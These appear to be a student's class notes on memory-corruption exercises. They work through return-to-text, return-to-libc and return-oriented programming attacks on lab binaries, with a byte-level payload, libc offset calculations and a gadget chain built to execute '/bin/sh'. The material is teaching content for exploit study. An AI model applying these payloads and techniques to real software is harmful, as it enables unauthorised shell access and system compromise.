..

Secure Programming 2014-11-04

2014/11/04 Secure Programming Class Note

foo_4

Training for “return to text” attack.

  • binsh: 0x0804a030, but actual address is at 0x08048640.

  • system: 0x080483e0

  • print 'a'*24 + '\xe0\x83\x04\x08' + 'aaaa' + '\x40\x86\x04\x08'

foo_5

Training for “return to libc” attack.

Notice: libc.so is provided

  • objdump -d libc.so
    • 00019970 <__libc_start_main>:
    • 0003fc40 <__libc_system>:
      • offset: 262d0

Example:

Function: libc_start_main’s address is : 0xf75f5970

Function: libc_system’s address is : 0xf75f5970 + 0x262d0 = 0xf761bc40

  • objdump -R foo_5
    • 0804a01c R_386_JUMP_SLOT __libc_start_main
  • 0804a02c <binsh>:
    • actual address: 08048620

foo_6

Training for “return-oriented programming” attack.

  • int 0x80
  • eax: call what kind of system call. See reference for Linux system call table. In this problem we want to call sys_execve, so we should use “11” for eax.
  • ebx, ecx: arguments for system call. In this case we put the address of “/bin/sh” which is 0x080be568 into ebx and no need of ecx.
  • remember the number of pops, smash the stack

Gadget 1

  • first gadget: 0x080594ac
  • reset eax to 0 by XOR itself
  • value for pop ebx: 0x080be568 (/bin/sh)
  • return address of first gadget: 0x0805cc5c
80594ac:       31 c0                   xor    eax,eax
80594ae:       5b                      pop    ebx
80594af:       c3                      ret

Gadget 2

  • second gadget: 0x0805cc5c
  • garbage value for pop edi: aaaa
  • return address of second gadget: 0x0805cc5c
  • repeat 11 times to make eax = 0x0000000b
  • last return address of second gadget: 0x0806f0e0
805cc5c:       40                      inc    eax
805cc5d:       5f                      pop    edi
805cc5e:       c3                      ret

Gadget 3

third gadget: 0x0806f0e0

806f0e0:       cd 80                   int    0x80
806f0e2:       c3                      ret

Failed Gadget

Program received signal SIGSEGV in 0x080db8ce. Still don’t know why :(

80db8cd:       40                      inc    eax
80db8ce:       02 af 0a 0e 0c 41       add    ch,BYTE PTR [edi+0x410c0e0a]
80db8d4:       c3                      ret

Cannot use pop eax because 0x0000000b contains 00 which is null. It will terminate the input string unexpectedly.

80e205d:  58                      pop    eax
80e205e:  c3                      ret

Reference